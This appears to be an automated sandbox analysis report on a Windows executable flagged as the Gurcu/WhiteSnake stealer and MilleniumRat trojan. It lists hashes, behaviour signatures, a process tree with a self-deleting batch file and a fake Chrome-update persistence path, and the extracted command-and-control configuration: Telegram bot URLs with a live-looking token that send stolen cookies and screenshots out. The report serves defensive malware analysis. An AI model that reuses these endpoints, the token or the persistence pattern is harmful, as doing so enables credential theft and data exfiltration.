Overview

overview

10

Static

static

3

file.exe

windows7-x64

7

file.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    129s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-12-2024 02:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    file.exe

  • Size

    5.6MB

  • MD5

    3442efc1a403eaeee70cc2a6729ee87b

  • SHA1

    9fcc1af6ba397c0fcfb979af53e2e76c406e6080

  • SHA256

    34443c63e5b3678dfd5df2e83fb1c70dcad8fbaa658a25bcde512e216e8d4a1c

  • SHA512

    869bf4a24dbafe05a43872c6ff0ff437685df6dba97519fc1a58ce96ea2166a01162a77043f4ff52d488301e3d7f34f7c9c71cfa19b4ebad512a626c8ca43dca

  • SSDEEP

    98304:tJRl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcG:tWOuK6mn9NzgMoYkSIvUcwti7TQlvcih

Score
10/10
gurcumilleniumratdiscoveryratspywarestealer

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendMessage?chat_id=7538374929

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/getUpdates?offset=-

https://api.telegram.org/bot7733030005:AAEneIh4MdJeCVQCr4Pys9pel6q03FCPCi0/sendDocument?chat_id=7538374929&caption=%F0%9F%93%B8Screenshot%20take

Signatures

  • Gurcu family
    gurcu
  • Gurcu, WhiteSnake

    Gurcu aka WhiteSnake is a malware stealer written in C#.

    stealergurcu
  • MilleniumRat

    MilleniumRat is a remote access trojan written in C#.

    ratstealermilleniumrat
  • Milleniumrat family
    milleniumrat
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2472
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpA6DF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpA6DF.tmp.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1900
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
          PID:2576
        • C:\Windows\system32\tasklist.exe
          Tasklist /fi "PID eq 2472"
          3⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4272
        • C:\Windows\system32\find.exe
          find ":"
          3⤵
            PID:4528
          • C:\Windows\system32\timeout.exe
            Timeout /T 1 /Nobreak
            3⤵
            • Delays execution with timeout.exe
            PID:5048
          • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
            "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:2724

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll
        Filesize

        1.7MB

        MD5

        65ccd6ecb99899083d43f7c24eb8f869

        SHA1

        27037a9470cc5ed177c0b6688495f3a51996a023

        SHA256

        aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

        SHA512

        533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\tmpA6DF.tmp.bat
        Filesize

        286B

        MD5

        bd0de624387a479ea910d30a8f625374

        SHA1

        6ea0b1a6d09fdd73041a177a229f1fcc7976679b

        SHA256

        9e4bfc822909ca711f0d9fcf57fde907856e8ec543a35c5907c7f19b05afa772

        SHA512

        f74ca4c84daa9bacbbd58d824daa08b599e47fee0018cc6fd93b28e8b04a3dff654037b0ed143a27a7f1e697bea71f1ba02b080b8c5e33aa891ab515718d2e2e

        Download Submit

      • C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        Filesize

        5.6MB

        MD5

        3442efc1a403eaeee70cc2a6729ee87b

        SHA1

        9fcc1af6ba397c0fcfb979af53e2e76c406e6080

        SHA256

        34443c63e5b3678dfd5df2e83fb1c70dcad8fbaa658a25bcde512e216e8d4a1c

        SHA512

        869bf4a24dbafe05a43872c6ff0ff437685df6dba97519fc1a58ce96ea2166a01162a77043f4ff52d488301e3d7f34f7c9c71cfa19b4ebad512a626c8ca43dca

        Download Submit

      • memory/2472-7-0x00007FFF61230000-0x00007FFF61CF1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2472-0-0x00007FFF61233000-0x00007FFF61235000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2472-8-0x000001C4B9AC0000-0x000001C4B9ADE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2472-9-0x000001C4B9A90000-0x000001C4B9A9A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2472-13-0x00007FFF61230000-0x00007FFF61CF1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2472-6-0x000001C4D2250000-0x000001C4D22C6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/2472-1-0x000001C4B77E0000-0x000001C4B7D82000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2724-20-0x0000020AFD600000-0x0000020AFD66A000-memory.dmp

        Filesize

        424KB

        Download

      • memory/2724-22-0x0000020AFE9F0000-0x0000020AFEAA2000-memory.dmp

        Filesize

        712KB

        Download

      • memory/2724-23-0x0000020AFEAA0000-0x0000020AFEAF0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/2724-24-0x0000020AFD670000-0x0000020AFD692000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2724-26-0x0000020AFEB30000-0x0000020AFEB6A000-memory.dmp

        Filesize

        232KB

        Download

      • memory/2724-27-0x0000020AFB520000-0x0000020AFB546000-memory.dmp

        Filesize

        152KB

        Download

      • memory/2724-28-0x0000020AFF7F0000-0x0000020AFFB1E000-memory.dmp

        Filesize

        3.2MB

        Download

      • memory/2724-47-0x0000020AFEB10000-0x0000020AFEB22000-memory.dmp

        Filesize

        72KB

        Download